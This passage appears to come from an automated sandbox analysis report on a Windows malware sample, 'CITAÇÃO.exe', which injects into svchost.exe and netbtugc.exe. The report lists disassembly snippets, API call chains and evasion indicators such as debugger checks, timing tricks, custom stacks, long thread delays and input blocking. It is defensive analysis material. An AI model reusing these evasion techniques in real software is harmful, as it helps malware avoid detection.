            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02673060 push eax; ret 1_2_02673062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026860FC push 00000030h; retf 1_2_02686149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268789B push C5503231h; retf 1_2_026878A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268613C push 00000030h; retf 1_2_02686149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268E67B push ebp; retf 1_2_0268E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268E61E push eax; retf 1_2_0268E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026716F6 push ss; ret 1_2_02671859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268E6DA pushad ; ret 1_2_0268E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02671FF6 push ecx; ret 1_2_02671FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02687FCB push edx; iretd 1_2_02687FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02687CFB push 789F05E2h; iretd 1_2_02687D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026835E3 push ds; retf 1_2_026835F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026835D8 push ds; retf 1_2_026835F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02684594 push edi; retf 1_2_026845B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300225F pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030027FA pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx1_2_030309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300283D push eax; iretd 1_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300135E push eax; iretd 1_2_03001369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035D09AD push ecx; mov dword ptr [esp], ecx6_2_035D09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B60240 push esi; ret 6_2_02B60245
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5E30C push edi; retf 6_2_02B5E30F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B60580 push ds; retf 6_2_02B6058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B7452B push ds; iretd 6_2_02B7454B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B60575 push ds; retf 6_2_02B6058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B64838 push C5503231h; retf 6_2_02B64840
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeAPI/Special instruction interceptor: Address: 3F74ADC
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3380Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6594Jump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85765
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6872Thread sleep count: 3380 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6872Thread sleep time: -6760000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6872Thread sleep count: 6594 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6872Thread sleep time: -13188000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124Thread sleep time: -49500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B6C2C0 FindFirstFileW,FindNextFileW,FindClose,6_2_02B6C2C0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: firefox.exe, 00000008.00000002.2398782659.000001788C51C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::Q
            Source: DJonRIGNYjBRZ.exe, 00000007.00000002.4151858709.00000000011B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeAPI call chain: ExitProcess graph end nodegraph_0-84893
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026872B3 LdrLoadDll,1_2_026872B3
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_03F73718 mov eax, dword ptr fs:[00000030h]0_2_03F73718
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_03F715A0 mov eax, dword ptr fs:[00000030h]0_2_03F715A0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_03F71540 mov eax, dword ptr fs:[00000030h]0_2_03F71540
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_03F74DA8 mov eax, dword ptr fs:[00000030h]0_2_03F74DA8
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_03F74D48 mov eax, dword ptr fs:[00000030h]0_2_03F74D48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]1_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]1_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]1_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h]1_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310634F mov eax, dword ptr fs:[00000030h]1_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]1_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]1_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]1_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]1_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]1_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310625D mov eax, dword ptr fs:[00000030h]1_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]1_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]1_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]1_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h]1_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
